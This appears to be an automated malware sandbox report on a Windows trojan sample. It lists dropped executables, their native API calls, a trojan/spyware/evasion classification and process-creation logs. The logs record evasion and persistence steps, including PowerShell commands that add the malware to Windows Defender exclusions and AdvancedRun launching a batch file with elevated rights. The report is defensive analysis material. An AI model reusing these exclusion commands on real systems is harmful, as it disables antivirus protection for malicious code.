Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAAE70 ZwSetInformationWorkerFactory,	20_2_6ABAAE70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9670 ZwQueryInformationProcess,	20_2_6ABA9670
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction,	20_2_6AB9BE62
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC33E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,	20_2_6AC33E22
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAB650 RtlUnhandledExceptionFilter,ZwTerminateProcess,	20_2_6ABAB650
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9650 ZwQueryValueKey,	20_2_6ABA9650
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAB640 RtlUnhandledExceptionFilter,ZwTerminateProcess,	20_2_6ABAB640
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC1FE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC1FE3F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6A7B0 RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwDuplicateToken,ZwSetInformationThread,ZwClose,ZwClose,RtlImpersonateSelfEx,	20_2_6AB6A7B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABEA7AC ZwCompareSigningLevels,ZwCompareSigningLevels,	20_2_6ABEA7AC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA3FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection,	20_2_6ABA3FA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA97A0 ZwUnmapViewOfSection,	20_2_6ABA97A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC15F87 ZwUnmapViewOfSection,	20_2_6AC15F87
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA97F0 ZwOpenThreadTokenEx,	20_2_6ABA97F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB70FFD RtlInitUnicodeString,ZwQueryValueKey,	20_2_6AB70FFD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB937EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,	20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF0FEC ZwDuplicateObject,ZwDuplicateObject,	20_2_6ABF0FEC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence,	20_2_6AB9DFDF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAAFD0 ZwShutdownWorkerFactory,	20_2_6ABAAFD0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFE7D3 ZwOpenThreadTokenEx,ZwOpenThreadTokenEx,	20_2_6ABFE7D3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister,	20_2_6AB6F7C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA97C0 ZwTerminateProcess,	20_2_6ABA97C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,	20_2_6AB9E730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9730 ZwQueryVirtualMemory,	20_2_6ABA9730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38F6A RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC38F6A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9710 ZwQueryInformationToken,	20_2_6ABA9710
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC1CF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,	20_2_6AC1CF70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB99702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,	20_2_6AB99702
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9F70 ZwCreateIoCompletion,	20_2_6ABA9F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9770 ZwSetInformationFile,	20_2_6ABA9770
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose,	20_2_6ABF176C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAAF60 ZwSetTimer2,	20_2_6ABAAF60
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9750 ZwQueryInformationThread,	20_2_6ABA9750
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC1CF30 ZwAlertThreadByThreadId,	20_2_6AC1CF30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,	20_2_6AB9174B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA0F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose,	20_2_6ABA0F48
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABEA746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel,	20_2_6ABEA746
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9740 ZwOpenThreadToken,	20_2_6ABA9740
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC38CD6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA0CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,	20_2_6ABA0CA1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,	20_2_6ABE3C93
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC214FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC214FB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAA480 ZwInitializeNlsFiles,	20_2_6ABAA480
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC164FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose,	20_2_6AC164FB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,	20_2_6AB6F4E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF1CE4 ZwQueryInformationProcess,	20_2_6ABF1CE4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC34CAB ZwTraceControl,	20_2_6AC34CAB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB62CDB RtlFreeHeap,ZwClose,ZwSetEvent,	20_2_6AB62CDB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC39CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC39CB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8FC39 ZwAssociateWaitCompletionPacket,	20_2_6AB8FC39
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAA420 ZwGetNlsSectionPtr,	20_2_6ABAA420
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC13C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,	20_2_6AC13C60
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA0413 ZwUnmapViewOfSection,	20_2_6ABA0413
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38C75 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC38C75
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,	20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF1C76 ZwQueryInformationProcess,	20_2_6ABF1C76
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9C70 ZwAlpcConnectPort,	20_2_6ABA9C70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA5C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,	20_2_6ABA5C70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21411 ZwTraceEvent,	20_2_6AC21411
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,	20_2_6AB8746D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38C14 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC38C14
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread,	20_2_6AB65450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFC450 RtlReleasePrivilege,ZwAdjustPrivilegesToken,ZwSetInformationThread,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,	20_2_6ABFC450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF1C49 ZwQueryInformationProcess,	20_2_6ABF1C49
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9C40 ZwAllocateVirtualMemoryEx,	20_2_6ABA9C40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA95B0 ZwSetInformationThread,	20_2_6ABA95B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9DB0 ZwAlpcSetInformation,	20_2_6ABA9DB0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB665A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,	20_2_6AB665A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9DA0 ZwAlpcSendWaitReceivePort,	20_2_6ABA9DA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63591 ZwSetInformationFile,	20_2_6AB63591
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData,	20_2_6AB7DD80
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC1BDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,	20_2_6AC1BDFA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21582 ZwTraceEvent,	20_2_6AC21582
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB695F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads,	20_2_6AB695F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA95F0 ZwQueryInformationFile,	20_2_6ABA95F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9DE0 ZwAssociateWaitCompletionPacket,	20_2_6ABA9DE0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB645D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread,	20_2_6AB645D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA95D0 ZwClose,	20_2_6ABA95D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB64DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation,	20_2_6AB64DC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA95C0 ZwSetEvent,	20_2_6ABA95C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8EDC4 ZwCancelWaitCompletionPacket,	20_2_6AB8EDC4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,	20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB91520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9520 ZwWaitForSingleObject,	20_2_6ABA9520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC26D61 ZwAllocateVirtualMemoryEx,	20_2_6AC26D61
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAAD10 ZwSetCachedSigningLevel,	20_2_6ABAAD10
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF1D0B ZwSetInformationProcess,	20_2_6ABF1D0B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9D70 ZwAlpcQueryInformation,	20_2_6ABA9D70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose,	20_2_6ABF1570
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF1D6A ZwWaitForMultipleObjects,	20_2_6ABF1D6A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC1FD22 ZwQueryInformationProcess,RtlUniform,	20_2_6AC1FD22
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB90548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory,	20_2_6AB90548
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38D34 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC38D34
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF1D43 ZwQueryInformationThread,	20_2_6ABF1D43
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE3540 LdrAppxHandleIntegrityFailure,RtlQueryPackageIdentityEx,memset,ZwQueryValueKey,RtlFreeHeap,ZwClose,memset,memset,RtlCaptureContext,RtlReportException,ZwTerminateProcess,	20_2_6ABE3540
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Code function: 22_2_022E48D8 NtAllocateVirtualMemory,	22_2_022E48D8
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Code function: 22_2_022E48D0 NtAllocateVirtualMemory,	22_2_022E48D0

Source: 1254.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 39A7.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5483.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 20BD.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 69B.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 9415.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 16BC.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 3D90.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ssbavbe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: F7E3DjYJpC.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\iwbavbe

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@51/35@62/9

Source: C:\Users\user\AppData\Local\Temp\69B.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe

Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

25_2_00401306

Source: F7E3DjYJpC.exe

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe

Code function: 25_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,

25_2_0040A33B

Source: F7E3DjYJpC.exe

Virustotal: Detection: 28%

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\F7E3DjYJpC.exe 'C:\Users\user\Desktop\F7E3DjYJpC.exe'
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Process created: C:\Users\user\Desktop\F7E3DjYJpC.exe 'C:\Users\user\Desktop\F7E3DjYJpC.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe
Source: C:\Users\user\AppData\Roaming\iwbavbe	Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\69B.exe C:\Users\user\AppData\Local\Temp\69B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1254.exe C:\Users\user\AppData\Local\Temp\1254.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\20BD.exe C:\Users\user\AppData\Local\Temp\20BD.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\31F4.exe C:\Users\user\AppData\Local\Temp\31F4.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3C84.exe C:\Users\user\AppData\Local\Temp\3C84.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\46D6.exe C:\Users\user\AppData\Local\Temp\46D6.exe
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5483.exe C:\Users\user\AppData\Local\Temp\5483.exe
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /SpecialRun 4101d8 2812
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9415.exe C:\Users\user\AppData\Local\Temp\9415.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 'C:\Users\user\AppData\Local\Temp\31F4.exe'
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Roaming\iwbavbe	Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /SpecialRun 4101d8 5256
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ssbavbe C:\Users\user\AppData\Roaming\ssbavbe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\16BC.exe C:\Users\user\AppData\Local\Temp\16BC.exe
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Process created: C:\Users\user\Desktop\F7E3DjYJpC.exe 'C:\Users\user\Desktop\F7E3DjYJpC.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\69B.exe C:\Users\user\AppData\Local\Temp\69B.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1254.exe C:\Users\user\AppData\Local\Temp\1254.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\20BD.exe C:\Users\user\AppData\Local\Temp\20BD.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\31F4.exe C:\Users\user\AppData\Local\Temp\31F4.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iwbavbe	Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force	Jump to behavior
